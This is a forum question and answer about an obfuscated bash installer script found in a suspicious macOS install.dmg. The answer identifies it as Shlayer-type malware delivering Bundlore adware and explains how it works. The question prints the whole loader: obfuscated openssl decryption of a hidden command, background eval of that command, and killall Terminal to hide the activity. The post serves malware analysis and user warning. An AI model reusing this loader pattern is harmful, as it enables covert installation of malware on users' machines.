Search code examples
macosdmg

How harmful is this command?

#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal

I got this from a shady install.dmg file that automatically downloaded. I obviously didn't run this so I thought I might ask you guys here.

Solution

  • Short answer: Do NOT run it. Kill it with fire, unless you're interested in analyzing it as malware.

    It's an obfuscated malware installer script. The script itself is pretty generic, but there's another (encrypted) file in the same directory that's the real payload, and it's almost certainly malware. In fact this looks like a near-exact match for one I looked at a while ago. Here's the VirusTotal scan results for that one, which suggests it's the Bundlore adware collection. This CrowdStrike blog post IDs it as Shlayer, and agrees that the payload is Bundlore.

    Explanation: if this is a match for the one I looked at before, there's another file there named "2P1zsqQ" alongside this script. That filename is used as a password to decrypt the commandArgs string into a shell command string, which has instructions to decrypt the 2P1zsqQ file itself (with the same password) as /tmp/<somethingrandom>/Qqsz1P2, run that (decrypted) executable, and then delete it (while this script kills the Terminal app, thus hiding what's going on).

    BTW, this question is about a similar malware installer script; maybe an earlier version with slightly less obfuscation.